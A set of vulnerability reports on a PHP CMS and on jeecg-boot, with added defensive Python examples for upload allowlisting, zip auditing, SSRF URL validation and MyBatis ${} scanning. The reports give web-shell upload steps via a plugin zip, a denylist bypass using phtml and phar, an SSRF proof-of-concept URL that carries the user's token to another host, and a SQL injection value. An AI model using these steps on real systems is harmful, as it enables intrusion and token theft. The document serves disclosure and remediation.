azraelxuemo
We create a directory containing a config.json with the content { "data_id":"12", "name":"aaa" }. The data_id and name fields must be present; their values are arbitrary. Then create any index.php containing a web shell, and package the directory as a zip. The config.json is used here to assign $config and $data_id, which is what makes the write possible. The zip we finally upload is written directly to public/index.php. Fix suggestion: only allow uploading files with the html extension.
Here I used the latest CMS version, 2.3.0. Write a test PHP file and package it as a zip. Go to the backend, choose Website Management -> Payment Method, and upload the zip. The vulnerable point is GetPaymentConfig. The class_exists call in GetPaymentConfig tries to locate the file and then enters load_class; Findfile finds the uploaded file. This is effectively copying the temporary file into the extend directory first and then automatically including it. If we did not write the plugin as required, an error is reported and the file is deleted, but because of the include, our code has already been executed. An error is reported here, and then the result of the code execution is displayed.
There have been a lot of file upload problems in the past, and you fixed some of them. The exclude_ext is only php, so we can upload other extensions to bypass it, such as phar, phtml.....
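The three reports above describe a plugin zip (config.json plus index.php) that ends up included by the CMS, and an extension denylist that only excludes php. The following is an added example, not code from the CMS or from the reporter: it contrasts that denylist with an allowlist, and audits an uploaded plugin archive by member name before anything is extracted or included. The extension sets, the function names and the sample archive are constructed for this example.

```python
"""Added example, not code from the CMS discussed in the reports above.
It contrasts the reported denylist (exclude_ext = php) with an allowlist,
and audits a plugin zip like the config.json + index.php archive described
above before anything is extracted or included.  The extension sets, the
function names and the sample archive are all constructed for this example."""
import io
import posixpath
import zipfile

# The reported weak configuration: only "php" is excluded.
EXCLUDE_EXT = {"php"}
# Hypothetical allowlist for single-file uploads (the reporter suggests html only).
ALLOW_EXT = {"html"}
# Hypothetical allowlist for plugin archives: json is assumed for config.json.
PLUGIN_ALLOW_EXT = {"html", "json"}


def ext_of(name: str) -> str:
    """Lower-cased extension of the last path component ("" if none)."""
    base = posixpath.basename(name)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def denylist_allows(name: str) -> bool:
    """The weak check: anything whose extension is not on the list passes,
    so .phtml/.phar (served by the same PHP handler on many setups) slip through."""
    return ext_of(name) not in EXCLUDE_EXT


def allowlist_allows(name: str, allowed=frozenset(ALLOW_EXT)) -> bool:
    """The hardened check: only a known-safe extension passes."""
    return ext_of(name) in allowed


def build_zip(entries: dict[str, str]) -> bytes:
    """Build an in-memory archive from {member_name: content} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def audit_plugin_zip(data: bytes) -> list[str]:
    """Return the reasons a plugin archive must be rejected (empty list = clean).
    Checks run on member names only; nothing is extracted or executed."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue
            # Members must stay inside the extraction directory.
            if name.startswith("/") or "\\" in name or posixpath.normpath(name).startswith(".."):
                problems.append(f"path escapes extract dir: {name}")
            if not allowlist_allows(name, PLUGIN_ALLOW_EXT):
                problems.append(f"disallowed extension: {name}")
    return problems


# The archive shape from the report: config.json with data_id/name plus an
# index.php payload (placeholder content; constructed for this example).
SAMPLE_PLUGIN = build_zip({
    "plugin/config.json": '{ "data_id":"12", "name":"aaa" }',
    "plugin/index.php": "<?php /* placeholder, not a real payload */ ?>",
})
```

With the denylist, shell.phtml and shell.phar pass; with the allowlist they do not, and the sample archive is rejected because of plugin/index.php before the CMS ever copies it into extend or includes it.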
[jeecg-boot漏洞.pdf](https://github.com/jeecgboot/jeecg-boot/files/9858362/jeecg-boot.pdf)
# SysDictMapper.xml
queryDictTablePageList. You can see that no precompiling is performed.
# SysDictController.java
# SysDictServiceImpl.java
# vuln
There is no restriction on the user's control over the table, column, and database...
# CommonController.java
As you can see, the user can directly control the parameters without any check.
# poc
http://192.168.1.1:8088/jeecg-boot/sys/common/transitRESTful?url=http://192.168.1.132:10001
The request here will carry the token out.
# vuln
So...
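The report above is a server-side request forgery: the url parameter of transitRESTful is forwarded unchecked, and the forwarded request carries the caller's token. The following is an added example, not jeecg-boot code: a validator for such a transit parameter and a header filter for the upstream request. ALLOWED_HOSTS, the function names and the header names are assumptions for this example.

```python
"""Added example, not jeecg-boot code: a validator for a transit/proxy
parameter such as transitRESTful?url=..., and a header filter so the
upstream request does not carry the caller's token.  ALLOWED_HOSTS, the
function names and the header names are assumptions for this example."""
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist of backends the transit endpoint is meant to reach.
ALLOWED_HOSTS = frozenset({"api.example.internal"})
# Assumed set of credential-bearing headers that must never be forwarded.
SENSITIVE_HEADERS = frozenset({"authorization", "cookie", "x-access-token"})


def check_transit_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> tuple[bool, str]:
    """Return (ok, reason).  Only http(s) to an allowlisted hostname passes;
    literal IPs are refused outright, which closes the private-range probe
    from the PoC (http://192.168.1.132:10001) as well as loopback targets."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        # "allowed.host@evil.host" style confusion: refuse any userinfo.
        return False, "userinfo in URL not allowed"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # not a literal IP; fall through to the allowlist
    else:
        return False, f"literal IP {host} not allowed"
    if host.lower() not in allowed_hosts:
        return False, f"host {host} not in allowlist"
    return True, "ok"


def strip_sensitive_headers(headers: dict[str, str]) -> dict[str, str]:
    """The subset of incoming headers that is safe to copy onto the upstream request."""
    return {k: v for k, v in headers.items() if k.lower() not in SENSITIVE_HEADERS}
```

Resolving an allowlisted hostname and re-checking the resolved address against private ranges is the remaining step in a real deployment; it is left out here so the example runs offline.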
Java provides native precompiled SQL statements, which prevent SQL injection.
# queryListWithPermission
The figure below shows that no precompilation is done; it is recommended to change it to #{}. Although the project does not currently use this statement, future use cannot be ruled out, so a fix is recommended.
# updateNullByEmptyString
The figure below also uses ${}, but the value is actually hard-coded. For safety, it is recommended to change it to #{} as well.
# selectLogicDeleted
Changing to #{} is also recommended here.
# queryFilterTableDictInfo
# queryTableDictItemsByCodeAndFilter
# queryTableDictTextByKey
# queryTreeList
# queryTableDictWithFilter
# queryAllTableDictItems
# queryTableDictByKeysAndFilterSql
# sysUserMapper.xml
deleteLogicDeleted. You can see that no precompiling is performed.
# SysUserController.java
# SysUserServiceImpl.java
So users can pass malicious parameters in through HTTP requests to achieve SQL injection.
#...
# sysUserMapper.xml
revertLogicDeleted. You can see that no precompiling is performed.
# SysUserController.java
# SysUserServiceImpl.java
So users can pass malicious parameters in through HTTP requests to achieve SQL injection.
#...
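The mapper reports above (SysDictMapper.xml, the ${} statements listed in the precompilation report, and the two sysUserMapper.xml reports) all turn on the difference between MyBatis ${} and #{}. The following is an added example, not jeecg-boot code: it shows what each does at runtime, and a static check that lists every ${} in a mapper XML so remaining statements can be reviewed. The mapper XML is constructed to mirror the statement names in the reports; it is not the project's file, and the SQL in it is invented.

```python
"""Added example, not jeecg-boot code.  (1) What ${} does at runtime versus
#{}: text substitution before the SQL is parsed versus a bound parameter of
a precompiled statement.  (2) A static check that lists every ${} in a
mapper XML.  The mapper below is constructed to mirror the statement names
in the reports; it is not the project's file."""
import re
import xml.etree.ElementTree as ET

DOLLAR = re.compile(r"\$\{\s*([^}]*?)\s*\}")
HASH = re.compile(r"#\{\s*([^}]*?)\s*\}")


def render_with_dollar(sql: str, params: dict) -> str:
    """${name}: the value is pasted into the SQL text, so a crafted value
    rewrites the statement."""
    return DOLLAR.sub(lambda m: str(params[m.group(1)]), sql)


def render_with_hash(sql: str, params: dict) -> tuple[str, list]:
    """#{name}: the SQL keeps a placeholder and the value is bound separately,
    so the database never parses the value as SQL."""
    bound = []

    def repl(m):
        bound.append(params[m.group(1)])
        return "?"

    return HASH.sub(repl, sql), bound


# Constructed mapper: two statements still using ${}, one already using #{}.
SAMPLE_MAPPER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<mapper namespace="org.example.mapper.SysUserMapper">
  <delete id="deleteLogicDeleted">
    DELETE FROM sys_user WHERE del_flag = 1 AND id IN (${userIds})
  </delete>
  <select id="queryListWithPermission" resultType="map">
    SELECT * FROM sys_user
    <where>
      <if test="permissionSql != null">${permissionSql}</if>
    </where>
  </select>
  <select id="getUserByName" resultType="map">
    SELECT * FROM sys_user WHERE username = #{username}
  </select>
</mapper>
"""

STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}


def find_string_substitutions(mapper_xml: str) -> list[tuple[str, str]]:
    """(statement id, expression) for every ${...} in the mapper, including
    text nested inside dynamic tags such as <if>/<where>."""
    root = ET.fromstring(mapper_xml)
    findings = []
    for stmt in root:  # top-level statements only, so nothing is counted twice
        if stmt.tag not in STATEMENT_TAGS:
            continue
        sql_text = "".join(stmt.itertext())
        for m in DOLLAR.finditer(sql_text):
            findings.append((stmt.get("id"), m.group(1)))
    return findings
```

A value such as `1) OR 1=1 -- ` passed to the ${userIds} statement turns a targeted delete into one that matches every row; the same value bound through #{} stays a single parameter. The scanner is the check to run over every mapper in the project, since the reports note that some ${} uses are currently hard-coded or unused but are still live code.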